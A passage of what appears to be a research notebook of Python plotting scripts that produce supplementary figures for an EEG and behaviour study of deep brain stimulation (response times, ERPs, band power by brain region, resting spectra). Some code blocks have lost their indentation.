fits = DataFrame(dict(Fit = np.concatenate([AICs,BICs]),
                      Model = variables,
                      Metric = metrics))
## Signed log transform for display.
fits.Fit = np.sign(fits.Fit) * np.log(np.abs(fits.Fit))
## Plotting
fig, ax = plt.subplots(1,1,figsize=(10,5))
sns.set(style="white", font_scale=1.75)
g = sns.pointplot(x='Model', y='Fit', hue='Metric', data=fits,
                  palette='colorblind', kind='point', ax=ax, legend=1)
## Flourishes
ax.legend_.set_title(None)
ax.set(xlabel='', yticks=[-8.52, -8.50, -8.48])
ax.set_xticklabels(fits.Model.unique(), ha='left', rotation=-15, fontsize='18')
ax.set_ylabel('Model Deviance (Log Scale)')
sns.despine()
plt.tight_layout()
plt.savefig('plots/manuscript/supplementary/aic.png', dpi=300)
plt.savefig('plots/manuscript/supplementary/aic.svg', dpi=300)
```
### Figure S2: EEfRT Behavior
```
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
from scipy.stats import gamma, mannwhitneyu
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define useful functions.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
def gamma_censor(arr, threshold = 0.005):
    '''Censor extreme values under a fitted gamma distribution.

    Fits a gamma distribution (location fixed at 0) to the finite values
    of *arr*, then replaces observations falling in either tail of the
    fitted CDF (below *threshold* or above 1 - *threshold*) with NaN.

    Parameters
    ----------
    arr : array-like
        Observations (e.g. reaction times). May contain NaNs: the
        upstream RT filter already inserts them, so they are ignored
        during fitting and preserved in the output.
    threshold : float, optional
        Per-tail probability used for censoring.

    Returns
    -------
    ndarray
        Copy of *arr* with tail outliers (and pre-existing NaNs) as NaN.
    '''
    arr = np.asarray(arr, dtype=float)
    ## Fit on finite values only: NaNs in the input would otherwise
    ## poison the maximum-likelihood fit and censor every observation.
    finite = arr[np.isfinite(arr)]
    if finite.size == 0:
        return np.full_like(arr, np.nan)
    ## Estimate fit. Loc fixed to 0.
    p = gamma.fit(finite, floc=0)
    ## Compute likelihood of each value under the fitted distribution.
    likelihood = gamma.cdf(arr, *p)
    ## Censor both tails in a single pass. NaN likelihoods compare False,
    ## so pre-existing NaNs fall through and remain NaN in the output.
    return np.where((likelihood < threshold) | (likelihood > 1 - threshold),
                    np.nan, arr)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load data.
df = read_csv('behavior/clean_eefrt_behavior.csv')
## Remove outlier RTs.
df.ChoiceRT = np.where(df.ChoiceRT > 0.3, df.ChoiceRT, np.nan) # Remove RTs faster than 300 ms.
df.ChoiceRT = df.groupby('Subject').ChoiceRT.transform(gamma_censor) # Gamma censoring.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
fig, axes = plt.subplots(1,2,figsize=(15,6))
palette = ['#0571b0','#ca0020']
yvars = ['ChoiceRT', 'ButtonPressRate']
ylabels = ['Response Time (s)','Button Press Rate']
titles = ['EEfRT Choice', 'EEfRT Bar Fill']
for ax, y, ylabel, title in zip(axes, yvars, ylabels, titles):
    ## Compute Mann-Whitney U test (unpaired rank-sum) between DBS OFF
    ## and DBS ON. NOTE: the original comment said "Wilcoxon signed-rank",
    ## but mannwhitneyu is the unpaired variant.
    ## Drop NaNs first: the censoring above introduces NaNs, and
    ## mannwhitneyu does not ignore them.
    off = df.loc[df.DBS==0, y].dropna()
    on = df.loc[df.DBS==1, y].dropna()
    U, p = mannwhitneyu(off, on)
    ## Plot condition means.
    sns.barplot('DBS', y, data=df, palette=palette, ax=ax)
    ## Draw the significance bracket and annotate the test statistic.
    _, y2 = ax.get_ylim()
    ax.hlines(y2, 0, 1)
    ax.vlines(0, y2 * 0.975, y2)
    ax.vlines(1, y2 * 0.975, y2)
    ax.text(0.5, y2*1.025, 'U = %0.1f, p = %0.3f' %(U,p), ha='center', fontsize=24)
    ax.set(xlabel='', xticklabels=['OFF','ON'], ylim=(0, y2*1.15),
           ylabel=ylabel, title=title)
sns.despine()
plt.subplots_adjust(top=0.9, bottom=0.1, left=0.08, right=0.99, wspace=.2)
plt.savefig('plots/manuscript/supplementary/eefrt.png', dpi=180)
plt.savefig('plots/manuscript/supplementary/eefrt.svg', dpi=180)
plt.show()
```
### Figure S4: FCZ ERP
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## File parameters.
model_name = 'revised'
space = 'sensor'
label = 'FCZ'
freq = 15
## Plotting parameters.
contrasts = ['Interference','DBS']
palettes = [ ['#7b3294','#008837'], ['#0571b0','#ca0020'] ]
annotations = [ ['Control', 'Interference'], ['DBS OFF','DBS ON'] ]
ylimits = {'stim':(-5,1), 'resp':(-2.5,2.5)}
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Initialize figure.
fig, axes = plt.subplots(2,2,figsize=(12,9))
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
for n, contrast, colors, legends in zip(range(2), contrasts, palettes, annotations):
    for m, analysis in enumerate(['stim', 'resp']):
        ## Load source data.
        npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
        data = npz['data']
        times = npz['times']
        ## Load cluster results.
        f = os.path.join(space, 'results', '%s_%s_timedomain_results.csv' %(model_name, analysis))
        clusters = read_csv(f)
        ## Plot grand-average trace (mean +/- SEM) per condition.
        y1, y2 = ylimits[analysis]
        for i, color, legend in zip(range(2),colors,legends):
            ix, = np.where(info[contrast]==i)
            mu = data[ix].mean(axis=0)
            se = data[ix].std(axis=0) / np.sqrt(len(ix))
            axes[n,m].plot(times, mu, linewidth=3, color=color, label=legend)
            axes[n,m].fill_between(times, mu-se, mu+se, color=color, alpha=0.2)
        ## Shade significant clusters (FDR < 0.05).
        for ix in np.where((clusters.Label==label)&(clusters.Freq==freq)&
                           (clusters.Contrast==contrast)&(clusters.FDR<0.05))[0]:
            tmin, tmax = clusters.loc[ix,'Tmin'], clusters.loc[ix,'Tmax']
            ## np.linspace requires an integer sample count: the original
            ## float literal 1e3 raises TypeError on modern NumPy.
            axes[n,m].fill_between(np.linspace(tmin, tmax, 1000), y1, y2, color='k', alpha=0.2)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
for n in range(2):
for m in range(2):
y1, y2 = ylimits[analysis]
## Stimulus-locked edits.
if not m:
## Fix axes.
y1, y2 = -5, 1
xticks = np.array([0.0, 0.4, 0.9, 1.4])
axes[n,m].set(xticks=xticks, xticklabels=xticks - 0.4,
xlim=(-0.25,1.5), ylim=(y1,y2),
ylabel = r'FCz Voltage ($\mu$V)')
## Add markers.
for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
axes[n,m].text(x+0.02,y1+np.abs(y1*0.05),s,fontsize=22)
axes[n,m].vlines(x,y1,y2,linestyle='--',alpha=0.3)
## Response-locked edits.
else:
## Fix axes.
xticks = np.array([-1.0, -0.5, 0.0, 0.5, 1.0])
axes[n,m].set(xticks=xticks, xlim=(-1.0, 1.0), ylim=(y1, y2))
## Add markers
axes[n,m].text(0.02,y1+np.abs(y1*0.05),'Resp',fontsize=22)
axes[n,m].vlines(0.0,y1,y2,linestyle='--',alpha=0.3)
## Add legends above plot.
axes[n,m].legend(loc=1, handlelength=1.2, handletextpad=0.5,
labelspacing=0.1, borderpad=0)
## Add y-labels.
if n: axes[n,m].set_xlabel('Time (s)')
sns.despine()
plt.subplots_adjust(top=0.97, left = 0.08, right = 0.98,
bottom=0.1, hspace=0.35, wspace=0.1)
plt.savefig('plots/manuscript/supplementary/fcz.png')
plt.savefig('plots/manuscript/supplementary/fcz.svg')
plt.show()
plt.close()
```
### Figure S5
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters
space = 'source'
model_name = 'revised'
contrast = 'DBS'
## Label parameters.
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh',
'racc-rh', 'dacc-rh', 'pcc-rh', 'dmpfc-rh', 'dlpfc_1-rh', 'dlpfc_2-rh',
'dlpfc_3-rh', 'dlpfc_4-rh', 'dlpfc_5-rh', 'dlpfc_6-rh']
xlabels = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2',
'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG'] * 2
## Define averaging parameters.
baseline = (-0.5, -0.1)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Preallocate space.
analyses = []
freqs = []
rois = []
legend = []
values = []
for analysis in ['stim','resp']:
for label, xlabel in zip(labels,xlabels):
for freq, ffreq in zip(['theta','alpha','beta'],
[r'$\theta$',r'$\alpha$',r'$\beta$']):
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load trial information
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
## Load source data.
npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
data = npz['data']
times = npz['times']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Compute differences.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Define mask.
if analysis == 'stim': tmin, tmax = 0.4, 0.8
elif analysis == 'resp': tmin, tmax = -0.2, 0.2
## Compute averages within window.
delta = []
for i in range(2):
## Identify DBS on/off trials.
ix, = np.where(info.DBS==i)
## Compute average time course.
mu = data[ix].mean(axis=0)
## Reduce to time of interest.
mu = mu[(times >= tmin)&(times <= tmax)]
delta.append(mu)
## Compute difference.
delta = np.diff(delta, axis=0).squeeze()
## Append information.
analyses += [analysis] * len(delta)
freqs += [ffreq] * len(delta)
rois += [xlabel] * len(delta)
legend += [label] * len(delta)
values += delta.tolist()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Plotting.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Convert to DataFrame.
df = DataFrame([analyses, freqs, rois, legend, values],
index=('Analysis','Freq','ROI','Label','Delta')).T
df['Hemi'] = [s.split('-')[-1] for s in df.Label]
## Plot.
fig, axes = plt.subplots(4,1,figsize=(15,12))
analyses = ['stim','stim','resp','resp']
hemis = ['lh','rh','lh','rh']
ylabels = ['Left Hemisphere', 'Right Hemisphere', 'Left Hemisphere', 'Right Hemisphere']
titles = ['Stimulus-Locked',False,'Response-Locked',False]
for ax, analysis, hemi, ylabel, title in zip(axes, analyses, hemis, ylabels, titles):
## Plot.
ix = np.logical_and(df.Analysis==analysis,df.Hemi==hemi)
sns.barplot('ROI', 'Delta', 'Freq', df[ix], palette=sns.color_palette(n_colors=3), ax=ax)
## Add flourishes.
ax.hlines(0,*ax.get_xlim())
ax.set(xlabel = '', yticks=[0,0.5,1])
ax.set_xticklabels(df.ROI.unique(), fontsize=20, rotation=-15)
ax.set_ylabel(ylabel, fontsize=20)
ax.legend(loc=1, bbox_to_anchor=(1.125,0.9), labelspacing=0, borderpad=0,
handletextpad=0.25)
ax.legend_.set_title('Power (On - Off)', prop = {'size':'x-large'})
if title: ax.set_title(title)
## Draw asterisks.
for ax, analysis, hemi in zip(axes, analyses, hemis):
## Load significant clusters.
info = read_csv('source/results/revised_%s_frequency_results.csv' %analysis)
info = info[np.logical_and(info.Contrast=='DBS', info.FDR<0.05)]
info = info[[True if label.endswith(hemi) else False for label in info.Label]]
info = info[['Label','Freq']].drop_duplicates()
## Iteratively draw asterisks.
for _, row in info.iterrows():
y = df.loc[(df.Analysis==analysis)&(df.Label==row.Label)&
(df.Freq==r'$\%s$' %row.Freq),'Delta'].mean()
x1 = np.argmax(np.in1d(df.loc[df.Hemi==hemi,'Label'].unique(), row.Label))
x2 = np.argmax(np.in1d(['theta','alpha','beta'], row.Freq))
ax.annotate('*', xy=(0,0), xytext=(-0.32 + x1 + 0.28 * x2, y+0.05),
xycoords='data', fontsize=24)
sns.despine()
plt.subplots_adjust(left=0.075, right=0.9, top=0.95, bottom=0.06, hspace=0.5)
plt.savefig('plots/manuscript/supplementary/S5.png', dpi=180)
plt.savefig('plots/manuscript/supplementary/S5.svg', dpi=180)
plt.show()
```
### Figure S6: Out of Task Power
#### PSD of eyes-open resting state
```
import os
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from mne import Epochs, make_fixed_length_events, pick_channels, read_proj, set_log_level
from mne.io import Raw
from mne.time_frequency import psd_multitaper
set_log_level(verbose=False)
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define Parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters.
subjects = ['BRTU', 'CHDR', 'JADE', 'S2']
conds = ['resting_dbsoff_eo', 'resting_dbson_eo']
## Filtering parameters.
l_freq = 0.5
h_freq = 50
l_trans_bandwidth = l_freq / 2.
h_trans_bandwidth = 1.0
filter_length = '20s'
n_jobs = 3
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
root_dir = '../resting/raw/'
PSD = []
for subject in subjects:
s = []
for cond in conds:
## Load data.
raw = Raw('%s/%s_%s_raw.fif' %(root_dir, subject, cond), preload=True)
## Apply projection.
proj = '%s/%s_%s-proj.fif' %(root_dir, subject, cond)
if os.path.isfile(proj): raw.add_proj(read_proj(proj))
else: raw.set_eeg_reference()
raw = raw.apply_proj()
## Filter raw.
raw = raw.filter(l_freq, h_freq, filter_length=filter_length, l_trans_bandwidth=l_trans_bandwidth,
h_trans_bandwidth=h_trans_bandwidth)
## Create epochs.
events = make_fixed_length_events(raw, 1, start=1, stop=61, duration=1)
epochs = Epochs(raw, events, tmin=-0.5, tmax=1, baseline=(-0.5,0))
## Compute PSD
picks = pick_channels(raw.ch_names, ['FZ'])
psd, freqs = psd_multitaper(epochs, fmin=l_freq, fmax=30, picks=picks)
s.append(psd)
PSD.append(s)
## Merge into one array.
PSD = np.array(PSD).squeeze().swapaxes(0,1)
n_cond, n_subj, n_trial, n_freq = PSD.shape
PSD = PSD.reshape(n_cond,n_subj*n_trial,n_freq)
## Plot.
fig, ax = plt.subplots(1,1,figsize=(8,4))
for n, color, label in zip(range(2),['#0571b0','#ca0020'],['DBS OFF','DBS ON']):
mu = np.median(PSD[n], axis=0)
mu /= mu.sum()
ax.plot(freqs, mu, lw=3, color=color, label=label)
## Flourishes.
ax.vlines([4,8], 0, 0.15, linestyle='--', alpha=0.5)
ax.set(xlim=(0.5,30), xticks=(0.5,10,20,30), xticklabels=(0,10,20,30), xlabel='Frequency (Hz)',
ylim=(0,0.12), ylabel='Normalized PSD');
ax.legend(loc=0, borderpad=0, labelspacing=0)
sns.despine()
plt.tight_layout()
plt.savefig('plots/manuscript/supplementary/S6b.png')
plt.savefig('plots/manuscript/supplementary/S6b.svg')
from scipy.stats import mannwhitneyu
mask = np.logical_and(freqs >= 4, freqs <= 8)
psd = PSD[...,mask].mean(axis=-1)
psd = np.log10(psd)
mannwhitneyu(*psd)
```
#### Power Timecourses of all bands in FZ
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## File parameters.
model_name = 'revised'
space = 'sensor'
label = 'FZ'
baseline = (-0.5, -0.1)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load trial information.
info = read_csv('%s/afMSIT_sensor_info.csv' %space)
cdict = dict(DBS = ['#0571b0','#ca0020'], Interference = ['#7b3294','#008837'])
ldict = dict(DBS = ['DBS OFF','DBS ON'], Interference = ['Control', 'Interference'])
## Initialize figure.
fig = plt.figure(figsize=(18,12))
for i, analysis in enumerate(['stim','resp']):
    results = read_csv('sensor/results/revised_%s_frequency_results.csv' %analysis)
    for j, freq in enumerate(['theta','alpha','beta']):
        ## Load data.
        npz = np.load('%s/afMSIT_%s_%s_%s_%s.npz' %(space,space,analysis,label,freq))
        data = npz['data']
        times = npz['times']
        for k, contrast in enumerate(['DBS', 'Interference']):
            ## Initialize canvas.
            ax = plt.subplot2grid((4,3),(k+i*2,j))
            ## Plot power per condition of the contrast.
            for n, color, legend in zip(range(2),cdict[contrast],ldict[contrast]):
                ## Identify indices per condition of contrast.
                ix, = np.where(info[contrast]==n)
                ## Compute mean and standard error.
                mu = data[ix].mean(axis=0)
                ## If stimulus-locked, baseline subtract.
                if analysis == 'stim': mu -= mu[(times >= baseline[0])&(times <= baseline[1])].mean()
                se = data[ix].std(axis=0) / np.sqrt(len(ix))
                ## Plot.
                ax.plot(times, mu, linewidth=3, color=color, label=legend)
                ax.fill_between(times, mu-se, mu+se, color=color, alpha=0.2)
            ## Shade significant clusters (FDR < 0.05).
            for _, row in results.loc[(results.Contrast==contrast)&(results.Label==label)&
                                      (results.Freq==freq)&(results.FDR<0.05),
                                      ('Tmin','Tmax')].iterrows():
                ## np.linspace needs an integer count: the original float
                ## literal 1e3 raises TypeError on modern NumPy.
                ax.fill_between(np.linspace(row.Tmin, row.Tmax, 1000), -10, 10, color='k', alpha=0.1)
            ## Clean-up.
            if analysis == 'stim':
                ## Fix timing.
                ax.set(xlim=(-0.25,1.5), xticks=[0.0, 0.4, 0.9, 1.4],
                       xticklabels=[-0.4, 0.0, 0.5, 1.0], ylim=(-1.5,2), yticks=[-1, 0, 1, 2])
                ## Add time markers.
                ax.vlines([0, 0.4, 1.127],*ax.get_ylim(),linestyle='--',alpha=0.3)
                ax.hlines(0, *ax.get_xlim(), linestyle='--',alpha=0.3)
            elif analysis == 'resp':
                ## Fix timing.
                ax.set(xlim=(-1.0,1.0), xticks=np.arange(-1,1.1,0.5), ylim=(-2.5,1.5), yticks=[-2,-1,0,1])
                ## Add time markers.
                ax.vlines(0.0,*ax.get_ylim(),linestyle='--',alpha=0.3)
                ax.hlines(0, *ax.get_xlim(), linestyle='--',alpha=0.3)
            ## Special cases.
            if j: ax.set(yticklabels=[])
            if j == 2 and not k: ax.legend(loc=7, bbox_to_anchor=(1.53,0.5), labelspacing=0, handlelength=1.5)
            if j == 2 and k: ax.legend(loc=7, bbox_to_anchor=(1.6,0.5), labelspacing=0, handlelength=1.5)
            if not k: ax.set(xticklabels=[])
            if not i and not k: ax.set_title(r'$\%s$-power' %freq, fontsize=36)
## Additional annotations.
ax.annotate('Stimulus-Locked', xy=(0,0), xytext=(0.01, 0.75), xycoords='figure fraction',
rotation=90, fontsize=36, va='center')
ax.annotate('Response-Locked', xy=(0,0), xytext=(0.01, 0.25), xycoords='figure fraction',
rotation=90, fontsize=36, va='center')
sns.despine()
plt.subplots_adjust(left=0.07, right=0.85, top=0.95, bottom=0.05, hspace=0.175, wspace=0.15)
plt.savefig('plots/manuscript/supplementary/S6a.png')
plt.savefig('plots/manuscript/supplementary/S6a.svg')
```
### Figure S7: Significant Alpha/Beta clusters
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Load and prepare data.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load data.
f = 'source/results/revised_stim_frequency_results.csv'
df = read_csv(f)
## Limit data.
df = df[df.FDR<0.05]
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Defining plotting info.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Define label information.
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh',
'racc-rh', 'dacc-rh', 'pcc-rh', 'dmpfc-rh', 'dlpfc_1-rh', 'dlpfc_2-rh',
'dlpfc_3-rh', 'dlpfc_4-rh', 'dlpfc_5-rh', 'dlpfc_6-rh']
rois = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2',
'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG'] * 2
## Define plotting features.
conds = ['DBS','Interference']
colors = ['#ca0020','#008837']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Initialize figure.
fig, axes = plt.subplots(1,2,figsize=(15,12),sharex=True, sharey=True)
for ax, freq in zip(axes,['alpha','beta']):
    ## Reduce DataFrame to frequency of interest.
    copy = df[df.Freq==freq].copy()
    ## Plot event timings (image onset, MSIT onset, mean response).
    for x,s in zip([0, 0.4, 1.127],['IAPS','MSIT','Resp']):
        ax.text(x+0.01,-0.6,s,fontsize=20)
        ax.vlines(x, -1, len(labels), linewidth=2.5, linestyle='--',alpha=0.2)
    ## Plot clusters: one row per label, offset by contrast.
    for n, label in enumerate(labels[::-1]):
        for m, contrast in enumerate(conds):
            ## Extract clusters.
            ix = np.logical_and(copy.Contrast==contrast, copy.Label==label)
            clusters = copy.loc[ix,['Tmin','Tmax']]
            if not len(clusters): continue
            ## Plot clusters as horizontal bars spanning [Tmin, Tmax].
            y = n + m * 0.5
            ## DataFrame.as_matrix() was removed in pandas 1.0;
            ## to_numpy() is the supported replacement.
            for cluster in clusters.to_numpy():
                ax.hlines(y+0.25, cluster.min(), cluster.max(), color=colors[m], lw=12)
    ## Fix x-axis.
    xticks = np.array([0.0, 0.4, 0.9, 1.4])
    ax.set(xticks=xticks, xticklabels=xticks-0.4, xlim=(-0.25,1.5), xlabel='Time (s)')
    ## Set title.
    ax.set_title(r'$\%s$-Power' %freq)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Add flourishes.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Add legend.
for label, color in zip(conds,colors):
axes[1].plot([],[],lw=10,color=color,label=label,alpha=0.7)
axes[1].legend(loc=7, bbox_to_anchor=(1.5,0.5), handlelength=1.25, borderaxespad=0)
## Fix y-axis.
ax.set(yticks=np.arange(len(rois))+0.5, yticklabels=rois[::-1], ylim=(-0.7,len(rois)))
## Add dendrograms.
def dendrogram(ax, x, y1, y2, text):
    """Draw a labeled bracket in axes-fraction coordinates.

    Connects fractional y-positions *y1* and *y2* with a vertical line at
    fractional x-position *x*, closes the bracket with two short horizontal
    ticks back toward the axis edge, and writes *text* rotated 90 degrees
    at the bracket midpoint.

    NOTE(review): appears to assume x < 0 (bracket drawn left of the
    y-axis, as at the call sites below) -- confirm before reusing.
    """
    ## Parameters
    lw = 2.0
    alpha = 0.2
    ## Drawing: vertical spine of the bracket from y1 to y2.
    ax.annotate('', (x, y1), xycoords='axes fraction', xytext=(x,y2),
                arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
    ## Horizontal ticks closing the bracket at y1 and y2 (end just
    ## inside the axis at x = -1e-3).
    ax.annotate('', (x*1.02,y1), xycoords='axes fraction', xytext=(-1e-3,y1),
                arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
    ax.annotate('', (x*1.02,y2), xycoords='axes fraction', xytext=(-1e-3,y2),
                arrowprops=dict(arrowstyle='-', color='k', linewidth=lw, alpha=alpha))
    ## Label, rotated to read along the bracket.
    ax.annotate(text, (0,0), xycoords='axes fraction', xytext=(x*1.4, np.mean([y1,y2])),
                rotation=90, fontsize=30, va='center')
dendrogram(axes[0], -0.3, 0.025, 0.51, 'Right Hemisphere')
dendrogram(axes[0], -0.3, 0.515, 1, 'Left Hemisphere')
sns.despine()
plt.subplots_adjust(left=0.15, right=0.85, top=0.95, bottom=0.1, wspace=0.225)
plt.savefig('plots/manuscript/supplementary/S7.png', dpi=180)
plt.savefig('plots/manuscript/supplementary/S7.svg', dpi=180)
plt.show()
```
### Figure S8
```
import os
import numpy as np
import pylab as plt
import seaborn as sns
from pandas import DataFrame, concat, read_csv
sns.set_style("white")
sns.set_context('notebook', font_scale=2.5)
%matplotlib inline
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Define parameters.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## I/O parameters
space = 'source'
model_name = 'revised'
contrast = 'DBS'
freq = 'theta'
## Label parameters.
labels = ['racc-lh', 'dacc-lh', 'pcc-lh', 'dmpfc-lh', 'dlpfc_1-lh', 'dlpfc_2-lh',
'dlpfc_3-lh', 'dlpfc_4-lh', 'dlpfc_5-lh', 'dlpfc_6-lh']
xlabels = ['rACC', 'dACC', 'mCC', 'SFG', 'pMFG 1', 'pMFG 2', 'aMFG 1', 'aMFG 2', 'aIFG', 'pIFG']
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
### Main loop.
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
## Load trial information
info = read_csv(os.path.join(space, 'afMSIT_%s_info.csv' %space))
n_subj, = info.Subject.unique().shape
n_cond, = info.DBS.unique().shape
corr = []
for analysis in ['stim','resp']:
    ## Define the averaging window for this epoch.
    if analysis == 'stim': tmin, tmax = 0.4, 0.8
    else: tmin, tmax = -0.2, 0.2
    df = []
    for label, xlabel in zip(labels,xlabels):
        ## Load source data.
        npz = np.load(os.path.join(space, 'afMSIT_%s_%s_%s_%s.npz' %(space,analysis,label,freq)))
        data = npz['data']
        times = npz['times']
        ## Preallocate space: (subject x DBS condition) average power.
        mu = np.zeros((n_subj,n_cond))
        for n, subject in enumerate(info.Subject.unique()):
            for m in [0,1]:
                ## Locate trials.
                ix = np.logical_and(info.Subject==subject, info.DBS==m)
                ## Compute average within the window of interest.
                mu[n,m] = data[ix][:,(times >= tmin)&(times <= tmax)].mean()
        ## Convert to DataFrame.
        mu = DataFrame(mu, columns=('DBS_off','DBS_on'), index=info.Subject.unique())
        ## Compute DBSon - DBSoff power differential.
        mu['DBS_diff'] = mu.DBS_on - mu.DBS_off
        ## Compute DBSon - DBSoff RT differential (per-subject means).
        mu['RT_off'] = info.groupby(['DBS','Subject']).RT.mean()[0]
        mu['RT_on'] = info.groupby(['DBS','Subject']).RT.mean()[1]
        mu['RT_diff'] = mu.RT_on - mu.RT_off
        ## Store label information and label.
        mu['Label'] = label
        mu['ROI'] = xlabel
        df.append(mu)
    ## Concatenate DataFrames.
    df = concat(df)
    ## Compute power-vs-RT correlations per ROI.
    gb = df.groupby('ROI')[['DBS_diff','RT_diff']].corr().reset_index()
    ## DataFrame.drop with a positional axis argument was removed in
    ## pandas 2.0; pass axis=1 explicitly.
    gb = gb[gb.level_1=='DBS_diff'].drop(['level_1','DBS_diff'], axis=1)
    gb['Analysis'] = analysis
    corr.append(gb)
## Concatenate across analyses and relabel for the legend.
corr = concat(corr)
corr.Analysis = np.where(corr.Analysis=='stim','Stimulus-locked','Response-locked')
## Plot.
fig, ax = plt.subplots(1,1,figsize=(12,4))
